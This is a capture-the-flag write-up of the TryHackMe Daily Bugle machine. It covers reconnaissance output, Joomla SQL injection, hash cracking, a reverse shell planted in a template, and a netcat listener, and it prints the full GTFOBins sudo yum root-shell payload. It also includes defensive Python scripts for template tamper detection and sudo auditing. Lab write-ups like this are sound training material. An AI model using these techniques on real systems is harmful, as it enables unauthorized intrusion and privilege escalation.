TryHackMe: Daily Bugle — Writeup

Tom Philippe
Mar 16, 2021 · 5 min read

In this article, we will show how to exploit vulnerabilities to hack the Daily Bugle machine developed for TryHackMe, available here.

Reconnaissance

Let’s start with some reconnaissance. For this machine, I used autorecon, a tool developed by Tib3rius that automates a lot of reconnaissance tasks such as port scanning (with nmap), directory enumeration for webservers, share enumeration for SMB servers and so on.

Port scanning — Nmap

We obtained the following scan results.

Nmap scan report for 10.10.61.183
Host is up, received user-set (0.18s latency).
Scanned at 2021-03-16 07:30:05 EDT for 33s
Not shown: 997 closed ports
Reason: 997 conn-refused
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCbp89KqmXj7Xx84uhisjiT7pGPYepXVTr4MnPu1P4fnlWzevm6BjeQgDBnoRVhddsjHhI1k+xdnahjcv6kykfT3mSeljfy+jRc+2ejMB95oK2AGycavgOfF4FLPYtd5J97WqRmu2ZC2sQUvbGMUsrNaKLAVdWRIqO5OO07WIGtr3c2ZsM417TTcTsSh1Cjhx3F+gbgi0BbBAN3sQqySa91AFruPA+m0R9JnDX5rzXmhWwzAM1Y8R72c4XKXRXdQT9szyyEiEwaXyT0p6XiaaDyxT2WMXTZEBSUKOHUQiUhX7JjBaeVvuX4ITG+W8zpZ6uXUrUySytuzMXlPyfMBy8B
| 256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKb+wNoVp40Na4/Ycep7p++QQiOmDvP550H86ivDdM/7XF9mqOfdhWK0rrvkwq9EDZqibDZr3vL8MtwuMVV5Src=
| 256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP4TcvlwCGpiawPyNCkuXTK5CCpat+Bv8LycyNdiTJHX
80/tcp open http syn-ack Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-favicon: Unknown favicon MD5: 1194D7D32448E1F90741A97B42AF91FA
|_http-generator: Joomla! - Open Source Content Management
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
3306/tcp open mysql syn-ack MariaDB (unauthorized)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 16 07:30:38 2021 -- 1 IP address (1 host up) scanned in 33.66 seconds

Nmap indicates 3 open ports: 22, 80 and 3306. Port 80 is the default port for webservers and is reported as such by nmap. It will be the first service that we will look into.

Web Server

Autorecon gave us nice results while enumerating the web server:

/.htaccess (Status: 403) [Size: 211]
/.htaccess.html (Status: 403) [Size: 216]
/.htaccess.php (Status: 403) [Size: 215]
/.htaccess.asp (Status: 403) [Size: 215]
/.htaccess.aspx (Status: 403) [Size: 216]
/.htaccess.jsp (Status: 403) [Size: 215]
/.htaccess.txt (Status: 403) [Size: 215]
/.hta (Status: 403) [Size: 206]
/.hta.aspx (Status: 403) [Size: 211]
/.hta.jsp (Status: 403) [Size: 210]
/.hta.txt (Status: 403) [Size: 210]
/.hta.html (Status: 403) [Size: 211]
/.hta.php (Status: 403) [Size: 210]
/.hta.asp (Status: 403) [Size: 210]
/.htpasswd (Status: 403) [Size: 211]
/.htpasswd.jsp (Status: 403) [Size: 215]
/.htpasswd.txt (Status: 403) [Size: 215]
/.htpasswd.html (Status: 403) [Size: 216]
/.htpasswd.php (Status: 403) [Size: 215]
/.htpasswd.asp (Status: 403) [Size: 215]
/.htpasswd.aspx (Status: 403) [Size: 216]
/LICENSE.txt (Status: 200) [Size: 18092]
/README.txt (Status: 200) [Size: 4494]
/administrator (Status: 301) [Size: 242]
/bin (Status: 301) [Size: 232]
/cache (Status: 301) [Size: 234]
/cgi-bin/ (Status: 403) [Size: 210]
/cgi-bin/.html (Status: 403) [Size: 215]
/components (Status: 301) [Size: 239]
/configuration.php (Status: 200) [Size: 0]
/images (Status: 301) [Size: 235]
/includes (Status: 301) [Size: 237]
/index.php (Status: 200) [Size: 9290]
/index.php (Status: 200) [Size: 9290]
/language (Status: 301) [Size: 237]
/layouts (Status: 301) [Size: 236]
/libraries (Status: 301) [Size: 238]
/media (Status: 301) [Size: 234]
/modules (Status: 301) [Size: 236]
/plugins (Status: 301) [Size: 236]
/robots.txt (Status: 200) [Size: 836]
/robots.txt (Status: 200) [Size: 836]
/templates (Status: 301) [Size: 238]
/tmp (Status: 301) [Size: 232]
/web.config.txt (Status: 200) [Size: 1690]

In particular, the README.txt file was very interesting, since it told us that a CMS was in use: Joomla v3.7.

A quick Google search on this version tells us that it is vulnerable to SQL injection. On top of that, there are multiple publicly available exploits:

We will use the Python script, which quickly and easily yields results:

As we can see, this script listed the content of the users table. We now have the username and the password hash of what seems to be a Super User. Let’s attempt to crack that hash. Using John the Ripper and the rockyou wordlist, we quickly manage to crack it.

┌──(kali㉿kali)-[~/TryHackMe/Daily_Bugle]
└─$ john pass.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
redacted (?)
1g 0:00:04:47 DONE (2021-03-16 07:52) 0.003483g/s 163.1p/s 163.1c/s 163.1C/s thelma1..speciala
Use the "--show" option to display all of the cracked passwords reliably
Session completed

While enumerating the web server, we also noticed the /administrator entry. Let’s navigate to this page and log in using the newly obtained credentials. We are now inside the admin section of the CMS. Our next goal should be to get a reverse shell on the server. Luckily for us, Joomla lets us write our own PHP code, as long as we have the proper permissions.

We will inject our code into a template file. To do so, using the top menu, navigate to Extensions/Templates. Two templates are available; however, after testing, only the second one is in use. Let’s select the second one and edit its index.php file to include a reverse shell, as shown below.

Modification of index.php to spawn a reverse shell

Let’s open a netcat listener on our host machine: nc -lvnp 53. Then, navigate to the homepage of the website to trigger our newly added code. We obtain our reverse shell as user apache.
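As an added defensive counterpart to the template edit above (this is not code from the original writeup), the following Python script hashes every file under a Joomla templates directory against a deploy-time baseline and additionally flags PHP files that call command-execution functions; the directory layout, template names and the tampered line are constructed for the demo.

```python
import hashlib
import os
import re
import tempfile

# Command-execution calls that have no place in a template's index.php.
RISKY = re.compile(r"\b(exec|shell_exec|system|passthru|proc_open|popen|fsockopen|eval)\s*\(")

def build_manifest(root):
    """Map each file under templates/ to its SHA-256 (take this at deploy time)."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as f:
                manifest[os.path.relpath(full, root)] = hashlib.sha256(f.read()).hexdigest()
    return manifest

def audit_templates(root, manifest):
    """Return {relpath: [reasons]} for added/changed/deleted files and PHP files
    that now contain a command-execution call."""
    findings, current = {}, build_manifest(root)
    for rel, digest in current.items():
        reasons = []
        if rel not in manifest:
            reasons.append("new file")
        elif manifest[rel] != digest:
            reasons.append("modified since baseline")
        if rel.endswith(".php"):
            with open(os.path.join(root, rel), errors="replace") as f:
                hit = RISKY.search(f.read())
            if hit:
                reasons.append("calls %s()" % hit.group(1))
        if reasons:
            findings[rel] = reasons
    for rel in manifest.keys() - current.keys():
        findings[rel] = ["deleted"]
    return findings

def demo():
    # Constructed templates tree: clean baseline, then one index.php edited in place.
    root = tempfile.mkdtemp()
    for t in ("beez3", "protostar"):
        os.makedirs(os.path.join(root, t))
        with open(os.path.join(root, t, "index.php"), "w") as f:
            f.write("<?php defined('_JEXEC') or die; ?>\n<html></html>\n")
    manifest = build_manifest(root)
    with open(os.path.join(root, "protostar", "index.php"), "a") as f:
        f.write("<?php passthru('uptime'); ?>\n")  # constructed, harmless edit
    return audit_templates(root, manifest)
```

Run the baseline once from a known-clean deployment and store it off the web server; a cron job calling audit_templates would have caught the edit described above the first time it ran.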

Privilege escalation

Let’s try to elevate our privileges. Running linPEAS gives us interesting results. Specifically, it highlights the content of the following file:

/var/www/html/configuration.php:      public $password = 'redacted';

While checking the /home directory, we notice that only one user has a home directory: jjameson. We try the obtained password on this user and BINGO, we now have access to jjameson’s account.

Let’s check what this user can do:

sh-4.2$ sudo -l
sudo -l
Matching Defaults entries for jjameson on dailybugle:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User jjameson may run the following commands on dailybugle:
(ALL) NOPASSWD: /usr/bin/yum

It looks like we can invoke yum as root. GTFOBins already lists a technique for this executable, allowing us to get a root shell:

# temporary directory holding a yum config and a plugin that is loaded by it
TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF
cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF
cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
    os.execl('/bin/sh','/bin/sh')
EOF
sudo yum -c $TF/x --enableplugin=y
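The sudo -l output above is exactly what a defender should be auditing for. As an added example (not from the original writeup), this Python snippet parses that output format and flags root-runnable entries whose binary is shell-equivalent; the sample text and the short binary list are constructed assumptions, and a real audit would compare against the full GTFOBins sudo section.

```python
import re

# Constructed sample, modelled on the `sudo -l` output shown in the writeup.
SAMPLE = """\
Matching Defaults entries for jjameson on dailybugle:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    secure_path=/sbin\\:/bin\\:/usr/sbin\\:/usr/bin

User jjameson may run the following commands on dailybugle:
    (ALL) NOPASSWD: /usr/bin/yum
    (root) /usr/bin/systemctl restart httpd
"""

# Binaries that load plugins, open editors or otherwise run arbitrary code:
# granting them as root is equivalent to granting a root shell. Assumption:
# a deliberately short list for the demo.
SHELL_EQUIVALENT = {"/usr/bin/yum", "/usr/bin/vim", "/usr/bin/find", "/usr/bin/python"}

RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+)$")

def parse_sudo_l(text):
    """Return the command rules listed after the 'may run the following' header."""
    rules, in_cmds = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_cmds = True
            continue
        if not in_cmds:
            continue
        m = RULE.match(line)
        if m:
            tags = {t.strip(": ") for t in m.group("tags").split(":") if t.strip()}
            rules.append({"runas": m.group("runas"), "tags": tags, "cmd": m.group("cmd").strip()})
    return rules

def risky_rules(text):
    """Flag rules that hand a shell-equivalent binary to root; NOPASSWD makes it critical."""
    out = []
    for r in parse_sudo_l(text):
        binary = r["cmd"].split()[0]
        if r["runas"] in ("ALL", "root") and binary in SHELL_EQUIVALENT:
            sev = "critical" if "NOPASSWD" in r["tags"] else "high"
            out.append((sev, r["cmd"]))
    return out
```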

Thank you for reading!


Tom Philippe

Security researcher, passionate about hacking, Manager at Responsible Cyber